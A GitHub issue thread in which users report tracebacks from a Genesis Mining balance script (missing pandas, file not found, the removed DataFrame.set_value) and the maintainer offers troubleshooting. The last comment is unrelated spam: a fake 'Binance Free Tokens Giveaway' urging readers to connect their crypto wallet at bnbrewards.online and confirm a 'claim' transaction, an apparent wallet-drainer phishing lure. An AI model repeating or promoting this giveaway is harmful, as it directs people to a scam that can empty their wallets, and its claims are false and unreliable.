### ISSUE TITLE
Script no longer working?

### ISSUE THREAD

**Issue by Smiggel** [cryptotrade/genesis-balance#1]
Tried the script. When setting a new file name, it will not create one.

Also, when copying the example to a new file it does not work:
```
Empty DataFrame
Columns: [total, paid, balance, last payment, last payout]
Index: []

```

**Comment by vcaldas** [comment]
I didn't use the script for quite some time and the Genesis mining changed a bit the website. Sorry.

**Comment by vcaldas** [comment]
@Smiggel Could you specify exactly what did you do, so I can reproduce here?

**Comment by Smiggel** [comment]
I tried running the script on MacOS and Windows. On MacOS I get the message that I am missing packages

> ImportError: No module named pandas

On windows I get this:

> Traceback (most recent call last):
  File "C:\Users\Smiggel\Downloads\genesis-balance-master\genesis.py", line 27, in <module>
    df = pd.read_csv(args.filename, sep= '\t', names = col_names)
>  File "C:\Users\Smiggel\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\pandas\io\parsers.py", line 610, in read_csv
    return _read(filepath_or_buffer, kwds)
>   File "C:\Users\Smiggel\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\pandas\io\parsers.py", line 462, in _read
    parser = TextFileReader(filepath_or_buffer, **kwds)
>   File "C:\Users\Smiggel\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\pandas\io\parsers.py", line 819, in __init__
    self._engine = self._make_engine(self.engine)
>   File "C:\Users\Smiggel\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\pandas\io\parsers.py", line 1050, in _make_engine
    return mapping[engine](self.f, **self.options)  # type: ignore[call-arg]
>   File "C:\Users\Smiggel\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\pandas\io\parsers.py", line 1867, in __init__
    self._open_handles(src, kwds)
>   File "C:\Users\Smiggel\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\pandas\io\parsers.py", line 1362, in _open_handles
    self.handles = get_handle(
>   File "C:\Users\Smiggel\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\pandas\io\common.py", line 642, in get_handle
    handle = open(
> FileNotFoundError: [Errno 2] No such file or directory: 'test'

When I copy the example file and rename it to test for example, it also doesn't work. No browser is openend, etc. and I see this:

> Traceback (most recent call last):
>   File "C:\Users\Smiggel\Downloads\genesis-balance-master\genesis.py", line 55, in <module>
    payouts.set_value(coin, 'total', my_df.payout.sum())
>   File "C:\Users\Smiggel\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\pandas\core\generic.py", line 5465, in __getattr__
    return object.__getattribute__(self, name)
> AttributeError: 'DataFrame' object has no attribute 'set_value'

**Comment by vcaldas** [comment]
Ok
That helps a bit.
But, looking at the logs:
1. You should have pandas installed
2. The system is not finding the file or the folder. Probably you either don't have the file or you are running the code in a different place. Check the code and adapt the path or file
3. The error on 3 is probably consequence of 2 but there's an error opening the file.
4.
Let me know how this goes.

**Comment by Smiggel** [comment]
Tried it again. No luck. Although I got a little further this time:

> Traceback (most recent call last):
>  File "C:\Users\Smiggel\Downloads\genesis-balance-master\genesis.py", line 55, in <module>
    payouts.set_value(coin, 'total', my_df.payout.sum())
>  File "C:\Users\ Smiggel\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\pandas\core\generic.py", line 5465, in __getattr__
    return object.__getattribute__(self, name)
> AttributeError: 'DataFrame' object has no attribute 'set_value'

I made a copy of the example file and tried to use that file. That gave me the above error.

**Comment by shokry055** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*
